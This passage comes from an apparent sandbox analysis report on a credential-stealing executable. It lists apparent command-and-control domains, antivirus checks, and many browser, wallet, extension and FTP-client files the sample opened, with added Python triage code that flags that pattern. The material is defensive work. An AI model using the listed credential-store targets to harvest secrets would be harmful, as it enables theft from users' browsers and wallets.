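        rec["interval"] = rec["time"] // rec["count"] if rec["count"] else 0
    return dict(sleep), dict(tech)


if __name__ == "__main__":
    by_tid, by_tech = triage(SAMPLE_LINES)
    for tid, rec in sorted(by_tid.items()):
        print(f"TID {tid}: {rec['count']} sleeps, per-call delay {rec['interval']}, flagged={rec['flagged']}")
    for name, items in sorted(by_tech.items()):
        print(f"{name}: {len(items)} -> {items[:3]}")
```

Run it on the full row set from the report (after stripping the "Jump to behavior" link text) and the "vmware-suffixed site label" bucket fills with the bank and broker names, while "vm string" keeps only the VBOX__ ACPI key and the Hyper-V string; that split is the check to do before writing "detects VMware" in a report.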

HIPS / PFW / Operating System Protection Evasion

Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.1342743289.0000000005130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: presticitpo.store
Source: file.exe, 00000000.00000002.2350852255.00000000011F5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ^Program Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, file.exe, 00000000.00000003.1950914872.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2339998512.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1958054231.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354605740.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1950815118.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 7636, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: file.exe | String found in binary or memory: Wallets/Electrum-LTC
Source: file.exe | String found in binary or memory: Wallets/ElectronCash
Source: file.exe | String found in binary or memory: Jaxx Liberty
Source: file.exe | String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe | String found in binary or memory: Wallets/Exodus
Source: file.exe | String found in binary or memory: %appdata%\Ethereum
Source: file.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BWDRWEEARIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BWDRWEEARIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: Yara match, File source: 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: file.exe PID: 7636, type: MEMORYSTR
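The behaviour listing above is the raw material for a triage rule: a single process opening Chrome's Login Data, Firefox's key4.db, a run of Chrome extension stores, several FTP client profiles and half a dozen desktop wallet directories is the stealer fingerprint, regardless of which family the AV label names. The Python below is an added example (not part of this report and not Joe Sandbox code) that parses behaviour lines in the shape this report exports (process path, event name and target path; the extracted text may run them together or separate them with a comma), buckets each touched path into a credential-store class, de-duplicates repeated opens and returns a verdict. The class names, the regexes and the two-class threshold are my own assumptions, seeded from the paths listed in this report plus two sibling browser files (Cookies, logins.json) a triage script would want; the sample lines are constructed from this report's entries.

```python
import re
from collections import defaultdict

# Constructed sample input: a few behaviour lines in the shape Joe Sandbox report text
# exports (process path immediately followed by the event name, trailing link text
# "Jump to behavior"). The paths mirror entries from this report.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
"""

# Accepts both the fused export form and a ", " separated form; the link suffix is optional.
EVENT_RE = re.compile(
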